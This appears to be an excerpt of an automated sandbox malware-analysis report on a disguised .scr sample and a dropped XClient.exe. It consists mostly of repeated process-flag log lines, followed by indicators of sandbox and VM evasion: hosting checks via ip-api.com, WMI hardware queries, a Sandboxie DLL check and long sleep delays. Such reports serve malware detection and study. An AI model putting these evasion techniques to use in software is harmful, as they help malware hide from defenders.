Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000004.00000002.1694419298.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1717816114.00000000050E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7612, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegSvcs.exe, 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Memory allocated: 1E851490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 2E40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 2FC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 4FC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 7F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 23D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 43D0000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 677	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 9143	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5212	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4608	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8164	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1450	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5825	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3945	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5994
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3596

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-15926

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7408	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552	Thread sleep count: 5825 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552	Thread sleep count: 3945 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 1072	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3804	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

